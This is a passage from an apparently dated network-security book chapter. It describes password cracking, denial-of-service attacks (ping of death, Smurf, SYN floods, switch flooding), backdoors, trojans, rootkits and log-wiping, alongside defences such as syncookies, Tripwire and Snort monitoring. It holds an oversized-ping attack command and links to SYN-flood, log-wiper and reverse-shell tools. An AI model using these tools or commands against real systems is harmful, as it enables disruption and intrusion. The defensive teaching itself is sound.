of the letters. This usually makes a fairly difficult password; not so hard to
remember yet nearly impossible to crack. I also like to use some sort of
mnemonic for keeping the password for each system fresh in my mind.
Be aware that simply replacing letters with special characters is a well known
tactic among administrators and most cracking programs try these substitutions
early on.
While John the Ripper works well for UNIX-based machines, L0phtCrack is the
recommended tool for cracking Windows-based password files. The most current
incarnation of L0phtCrack is LC4. It is marketed as being a password auditing
and recovery application and is available for most every Windows release. The
only caveat to its use is that you are required to have administrator privileges
in order to run the application.
LC4 is not free. Though you do have a 15 day trial period before buying, a
license for a single machine costs $350. However, for administrators managing
several Windows systems and who have to periodically audit their security, LC4
provides useful information for securing the network. Unlike UNIX passwords,
most NT passwords do not use salts. This makes cracking the code easier and
faster for LC4. LC4 claims that, in most cases, within the first 10 minutes over
18% of all passwords on a typical system are cracked. 90% of all passwords are
recovered within 24 hours on a typical Pentium II/300. This includes the
Administrator and most Domain Admin passwords.
Denial of Service
There are some purely destructive methods of attacking systems. One of these is
a Denial of Service (DoS) attack. The basis behind a DoS attack is to deny a
victim’s machine all access to the outside as well as deny all outside hosts
connectivity to that machine as well. This is normally done by sending a flood
of ICMP or ping packets to the targeted box. If ping packets are normally denied
by that host’s firewall then similar backup tactics can be used. SYN requests,
crafted ICMP packets and applications that consume all the CPU’s power are
typical DoS-type attacks. For the very malicious a Distributed Denial of Service
(DDoS) attack involves the use of hundreds, if not thousands, of other machines
that together target a victim box with a flood of pings.
Consider a DoS attack similar to that of an ant swarm. One ant by itself is no
threat. It can easily be stepped on or brushed out of the way. The same applies
to a ping. But, should thousands of ants decide to swarm or, even worse, begin
biting they can quickly overpower even a large animal. Such is the case with a
DDoS attack. Millions of pings together quickly consume most network bandwidth
until nothing is left. However, attackers desiring to IP spoof a trusted host
may also use a DoS attack as a method of denying the trusted host from answering
another machine.
Due to the many different kinds of Denials of Service currently available on the
Internet, the default ruleset that comes with Snort has an entire section
devoted to DoS attacks. For most every possibility there is a matching rule.
When DoS attacks do occur (and they do occur quite often in several forms and
with varying levels of success), Snort quickly logs an alert. Check your Snort
logs often or employ ACID as a web interface. At the first sign of trouble
determine what type of attack is underway and thus mitigate the consequences or
at least minimize its effects. Check the rulesets included with Snort for a
brief listing of some of the many DoS and DDoS attacks Snort recognizes.
Let’s look at some of the more obvious tactics categorized as Denial of Service
attacks. The best type of machine on which to craft a DoS attack is UNIX-based.
Here you can set limits or assign variables to each ping packet. For example,
the command: ping -l 65527, sends out a ping packet with a data portion that is
65,527 octets long. Included with that packet is the header, which exceeds the
IP specification for the maximum packet size. This maximum size is set at 65,536
octets (1 octet being equal to 8 bits of data) along with a minimum of 20 octets
of IP header information and 0 or more octets of optional information. The rest
of the packet is data.
Some systems react unpredictably to an oversized ICMP packet such as this and
either lock up, freeze, crash or simply reboot. This is known as the Ping of
Death. It is a horribly antiquated attack, though it was potent at one time
against several Microsoft Windows versions.
Fortunately, most systems including nearly all Linux versions have been patched
against falling prey to this type of oversized packet. It was an issue for a
short time with Red Hat Linux 6.0, but subsequent releases and most users’
willingness to upgrade to the latest version quickly minimized its effects.
Most DoS attacks or intrusive events can be avoided if users would simply patch
their systems. The SQL Slammer worm that spread across the Internet in January
of 2003 in about 10 minutes exploited an older vulnerability. It targeted
Microsoft servers that should have been fixed several months previous with a
patch Microsoft had released in July of the previous year. The same goes for the
MSBlaster and Welchia worms that brought the Internet to its knees in August of
2003. Users had ample time to install and patch their systems against the
vulnerability.
Similar DoS attacks such as the Jolt2, discovered by BindView’s HackerShield
development team (http://razor.bindview.com/), are easily patchable with the
latest updates. The DoS is launched by sending out a steady stream of fragmented
packets. 150 packets per second is sufficient to cause the CPU performance to
spike at 100% so that no other processes run. Once the packets stop sending, the
machine resumes normal functions.
Another network-based Denial of Service attack that can result in an intrusion
attempt as well involves directed broadcast attacks. This is more commonly
referred to as a Smurf attack. It has its variants and offshoots such as the
Papasmurf and Fraggle attacks, the latter being a UDP-based cousin of Smurf.
This type of attack includes sending forged ICMP packets to broadcast addresses.
Normally the originating address is a forged addressed or spoofed IP from the
intended victim’s subnet. In this way, the attacker send out several pings to
the broadcast address of a system and all the machines in that subnet answer,
consuming the victim’s bandwidth or the true owner of the IP address used by the
attacker.
This type of attack has been compared to that of a corrupted “knock-knock” joke.
The attacker says “knock-knock” to an entire subnet and suddenly thousands of
voices answer, “Who’s there” overwhelming the victim’s system. Any network, no
matter how large or small, that responds to this type of broadcast query can
quickly become a perpetrator in a Smurf attack, whether intended or not. Best to
filter out ICMP messages at the network gateway, whether it is a firewall or
router. This may harm your own ability to monitor your system from outside if
you do not know what you are doing. But by filtering out pings so you are acting
as a good “Netizen” and protecting others.
Another type of attack which users should be aware of is the SYNflood attack.
This is initiated by sending a SYN packet to an intended victim, but no reply to
the SYN-ACK packet is sent back. These are classified as half-open TCP sessions.
The reply falls on deaf ears since the incoming address is normally spoofed and
has no place to go. Each SYN request ties up the victim’s server. Because each
machine can only handle a finite amount of open connections, it takes only a
little while for the victim’s queue to fill up.
There are many types of SYNflood tools available for download. Most are used by
“script kiddies”. Here are just a couple examples. Test them on your own
machines (if willing) to ensure you are not vulnerable. More are out there for
the taking.
Synflood.c
http://www.hackersclub.com/
sinful.c and synk4.c
http://www.anticode.com/
The best way to combat this for Linux systems is to implement TCP syncookie
support in the kernel. Enable this feature from the command line, provided it is
compiled into your kernel and run the command at boot time after the /proc file
system has loaded. It is easiest to simply add this line to the
/etc/rc.d/rc.local file.
# echo 1 >/proc/sys/net/ipv4/tcp_syncookies
Another method for stopping SYNflood attacks is to limit the number of embryonic
connections on the firewall. For example, the PIX firewall can accomplish this
easily by stating the number of current embryonic connections you want to a
particular subnet. This is the final numerical value at the end of most rules.
Inserting rules that filter out particular IP addresses is normally ineffective.
Remember, most attackers spoof their incoming IP address. If one address is
blocked they simply change tactics and use another.
The final DoS type of attack to examine here is macof, which comes with Dug
Song’s dsniff suite of tools. In normal switched networks packet traffic is
routed to their intended targets. In cases where the switch is secured and
ignores ARP packets you can use the macof tool to flood the switch. Due to the
limited CAM table size on some switches, when the switch is flooded above the
finite CAM table size limit the switch reverts to hub mode. This allows you to
monitor the local network traffic. Rather than being limited to a switched
network, any connected device including a laptop running in promiscuous mode can
better sniff packets and capture data.
Maintaining Control over Infected Systems
The first thing attackers do after gaining control of systems other than their
own is patch the compromised machine and close down all possible points of entry
to ensure no one else can take it over They then create backdoors and other
“pinhole” entry points so that if they are ever discovered and locked out they
have another method of regaining access. This is the most crucial aspect to
becoming a true cracker. The slightest slip-up and you reveal yourself to an
observant administrator. Stealth is of the essence. A cracker cannot be too
overt in what he does, otherwise he risks exposing himself to administrators who
pull the network plug.
However, to better secure your own network you as an administrator need to know
what to look for and be familiar with these stealthy methods. The next few
sections explain some of the means by which crackers maintain control over
compromised systems.
Backdoors
Backdoors are commonly implemented by both legitimate administrators and by
attackers who have taken control of a machine. Who of us, fearful that we might
forget the administrator or root password, has created another backup account
with the same privileges? Hopefully, not many of us are guilty of this. But, if
you are, have steps been taken to remove these security holes? Any form of
backdoor is yet another point of entry. Anything that allows a user access to a
system without going through the necessary security protocols is considered a
“backdoor”.
Some backdoors are also Trojan Horses. The program Back Orifice 2000 is one such
example. Normally, when installed it allows a lawful administrator to manage his
machine remotely. However, when it is bundled with another program or is hidden
deep within a file or piece of software, it ceases to be a backdoor, but is a
Trojan Horse that can be accessed from outside the network.
Applications with hidden Trojans may look just fine superficially, but it
actually contains a spyware program or access script for controlling the machine
remotely or launching some vicious attack against other systems. The site
Packetstormsecurity.com is perhaps the largest most comprehensive site for
locating and downloading backdoor applications, RootKits and security tools.
These include tools used for both auditing and cracking. It is never a bad thing
to be too familiar with the devices that can be used against you.
Trojan Horses and RootKits
A Trojan Horse is a separate concept from a backdoor, though not too dissimilar.
Disguised as an innocuous program, file or even image, it is a program that has
a sinister purpose. The person who wrote the Trojan hopes to attract the
attention of the user into using the program while in actuality it performs some
other malicious act. A few years ago it was CD-ROM writing software and later a
Windows version of SATAN. Those gullible users that installed it thought they
were getting a useful or fun tool when in reality all it did was wipe their hard
drive clean.
A similar thing happened with the “whack-a-mole” computer game that was
distributed and installed on many machines several years ago. Though users could
actually play a game, the program installed a copy of NetBus server 1.60 or 1.70
onto the system. NetBus is a spyware application that allows remote users to
monitor and log virtually every keystroke, web page or application run. It is
also nearly impossible to remove once it has been installed.
Some of the other malicious Trojan Horses and RootKits currently making their
rounds through the Internet are Sub7, Tini, VNC, Lrk6, T0rnkit, Knark, adore and
so forth. Those wishing to become more familiar with RootKits and how they
operate should visit rootkit.com. Be careful what you download and install on
your system. If you are willing to risk installing suspect applications, be
prepared to offer up your computer as a sacrifice at the altar of the pagan god,
fdisk and its cousin, format.
No section on RootKits would be complete with mentioning the RootKit checker,
chkrootkit. This application runs on most UNIX systems and looks for innocuous
programs or trojaned files that signal a RootKit has been installed. Check the
section in chapter 5 labeled “Checking for Rootkits” for more information on
decontaminating the system after you suspect a RootKit, other than one you
installed yourself, has been placed on your machine.
Hiding Your Tracks
Most crackers, if feel they are close to being discovered or if they sense the
impending doom of a pulled network plug, take the steps to hide their presence.
This includes wiping all traces of their occupation off the system. This is done
not only to avoid detection and legal action if their true IP address is found,
but also to keep secret the methods they employed to gain access. However, some
crackers and most “script kiddies” do not care and basically thumb their nose if
discovered. By the time they are found out they have already taken what they
want from your system and have compromised several others.
Those few who are very good at infiltration take care to conceal their methods
and hide all traces of their presence. They burrow so deep that all traces and
suspect backdoors may never be found. At a recent Infragard meeting I attended,
an upper-level FBI agent in charge of cyber-crime spoke to various security
administrators from the area. He related a case where crackers from some of the
former Soviet Republics had compromised so many systems and were so deeply
imbedded in certain financial institutions that cleaning the affected machines
would be more expensive that the amount of money being siphoned off. Starting
over from scratch and reformatting the drives was out of the question. The
managers could never be certain they had removed all traces or backdoors
installed by the crackers. The cost incurred by the cyber thieves is now viewed
as a necessary expenditure in order to keep their businesses operational.
Here are a few of the steps that you as a security administrator should take
when looking for “moles” or embedded programs within your systems. First,
install a monitoring system that alerts you to changes in specific files. A
program such as Tripwire does a decent job. For non-enterprise systems the free,
open source version is recommended. For systems that must be kept secure use the
commercial variety.
When probing your systems for security flaws, be on the look out for the
following tell-tale signs;
Hidden files or directories, especially directories that are named …/ or are
identifiable by three dots
Check for any other types of dot names in locations they would not be noticed.
Some of the more popular locations for hidden files are /dev, /tmp and /etc.
Look for edited or deleted log files. Always check the /var/log directory and
users’ .bash_history files. Crackers like to remove all evidence that they were
ever there.
Check log files that are not stored in ASCII format such as utmp, wtmp, btmp and
lastlog. Use something similar to the strings command to find known patterns
within these binary file formats.
Use a hacker’s tool such as remove.c by Simple Nomad, 1997 which removes entries
in binary files.
Some other binary log file editors are wtmped.c, marry.c, cloak.c, logwedit.c,
wzap.c and so forth. Consult the following location for more information:
http://www.packetstormsecurity.com/UNIX/penetration/log-wipers/.
Look for insidious applications that may be running in the background on your
system or that are set up to run at specific times. Programs such as these may
push out shell prompt to users outside your network using such innocuous
protocols as ICMP or port 80 or 53 while feigning normal web or DNS traffic. The
Reverse WWW Shell and Loki are two such applications that do exactly this. They
run on an internal host and then push out a prompt to a user outside the
network. The traffic appears as normal protocol and as such is usually ignored.
Snort normally detects rogue connection requests used by backdoors and Trojans.
Consult your logs frequently for these types of alerts if you suspect an
internal compromised host. Also, where you place your sensors may have
implications as to what you detect. Make certain there Snort sensors are
scattered throughout the network so that you can determine the point of
origination.
Preventive Maintenance
Given the many possibilities of infiltration and compromise of host systems, you
may think that there is no way to prevent anyone from overpowering your network
or machines. This is not the case. There are plenty of preventive steps you can
take as a security administrator to stop the majority of attacks. Knowing the
tools of the trade and acknowledging your own vulnerabilities is the first step
to securing your systems and network. Frequent the informative sites listed here
and any others that appear over time. Do not be lax in monitoring possible
exploits and patching your systems. This does not mean you should be overly
paranoid or suspect attacks at every instance. Finally, check your IDS logs
religiously. New signatures or alerts should be further investigated.
Even within your own network you cannot be too secure. Remove all protocols that
send files in the clear or are unencrypted. This includes migrating users off of
FTP, telnet and other plaintext protocols. Use OpenSSH or SSH2 instead along
with sftp. Also, use GnuPG or PGP for encrypting all email transactions.
If you want to find out more about what crackers are currently up to frequent
the IRC channels. Use X-Chat for Linux machines or mIRC for Windows machines.
Lurking is a potent method of listening and learning what others are doing. The
same applies to newsgroups. Subscribe to any group with the name “security” in
it. http://groups.google.com is a good starting place for locating useful groups
and posting messages for free.
Sites of Interest
The following lists the URL of each pertinent item mentioned in this chapter.
This list includes applications and web sites that contain white papers and
explanations.
AiroPeek
http://www.wildpackets.com/
Airscanner
http://www.airscanner.com/
AirSnort
http://airsnort.shmoo.com/
Broadband Reports
http://www.dslreports.com/scan
Cert
http://www.cert.org/
Cheops-ng
http://cheops-ng.sourceforge.net/
DoS Help
http://www.doshelp.com/dostest.htm
dsniff
http://www.monkey.org/~dugsong/dsniff/
ettercap
http://ettercap.sourceforge.net/
Firewalk
http://www.packetfactory.net/projects/firewalk/
fragroute
http://www.monkey.org/~dugsong/fragroute/
GnuPG
http://www.gnupg.org/
GovernmentSecurity.org
http://www.virusdot.org/index.php?module=defaultpwd&func=display&cid=1
ID Serve
http://grc.com/id/idserve.htm
IEEE OUI and Company_id Assignments
http://standards.ieee.org/regauth/oui/index.shtml
IP Calculator / IP Subnetting
http://jodies.de/ipcalc/
IP-Tools
http://www.ks-soft.net/ip-tools.eng/
ISECOM Security Tools
http://www.ideahamster.org/projects/operationaltools.htm
John the Ripper
http://www.openwall.com/john/
Kismet
http://kismetwireless.net/
libevent
http://www.monkey.org/~provos/libevent/
libdnet
http://libdnet.sourceforge.net/
libnet
http://www.packetfactory.net/projects/libnet/
libnids
http://www.packetfactory.net/projects/libnids/
LibWhisker
http://www.wiretrip.net/rfp/lw.asp
Loki
http://www.phrack.com/Archives/phrack51.tgz
MiniStumbler
http://www.netstumbler.com/
NetBus
http://www.netbus.org/
http://www.nwinternet.com/~pchelp/nb/netbus.htm
Netcat
http://www.atstake.com/research/tools/network_utilities/
Network Stumbler
http://www.netstumbler.com/
http://www.stumbler.net/
Network-Tools
http://www.network-tools.com/
Nessus
http://www.nessus.org/
Nikto
http://www.cirt.net/code/nikto.shtml
Nmap
http://www.insecure.org/nmap/
The Packetfactory
http://www.packetfactory.net/
OpenSSH
http://www.openssh.org/
Packetstromsecurity
http://packetstormsecurity.nl/
Pocket Warrior
http://www.pocketwarrior.org/
Razor Security
http://razor.bindview.com/
Reverse WWW Shell
http://www.megasecurity.org/Sources/rwwwshell-1_6_perl.txt
Sam Spade
http://www.samspade.org/
SecurityFocus
http://www.securityfocus.com/
Sniffit
http://reptile.rug.ac.be/~coder/sniffit/sniffit.html
Snort-Wireless
http://ingsoc.net/snort-wireless/
Snot
http://www.stolenshoes.net/sniph/index.html
SSL Proxy
http://www.obdev.at/products/ssl-proxy/index.html
Stick
http://www.eurocompton.net/stick/projects8.html
Tripwire
http://www.tripwire.com/
(Open Source) Tripwire
http://www.tripwire.org/
Virusdot.org
http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php
wepcrack
http://sourceforge.net/projects/wepcrack/
Whisker+SSL
http://www.digitaloffense.net/
Win Nuke Test Page
http://www.jtan.com/resources/winnuke.html
All applications and links are listed alphabetically and not in the order in
which they appear in this chapter. Also, some applications and links are not
specifically mentioned in this chapter, but may be required by associated
applications. Links are provided should the default Linux application not
automatically install these programs.
Summary
While this chapter explained many of the tools and tricks used by crackers to
exploit machines, it also laid out some suggested measures to take for securing
your own systems. It explained what to look for in the Snort logs for most
intrusive attempts or attacks. In order to understand the ways of the cracker,
you must think and act like a cracker. Exercise caution when using these tools.
You do not want to inadvertently hack into management’s file server or take out
your own systems. Use a test network to familiarize yourself with the methods
and tactics of crackers and how these tools can be of benefit to you. Use your
IDS application or tcpdump to sniff out new exploits, capture new logs and write
your own signatures.
The next chapter explains how to setup and configure a network intrusion
detection system or NIDS. We use Snort, ACID and SnortCenter for sniffing
packets while logging that data to a MySQL database. ACID provides a web
interface for administrators to view and manage all suspicious packets. We also
look at SnortCenter, a web tool for managing the installation and use of a
management console as well as multiple remote sensors strategically placed
throughout the network.
[ 30F ]
[ Prev Page | Goto Content | Next Page ]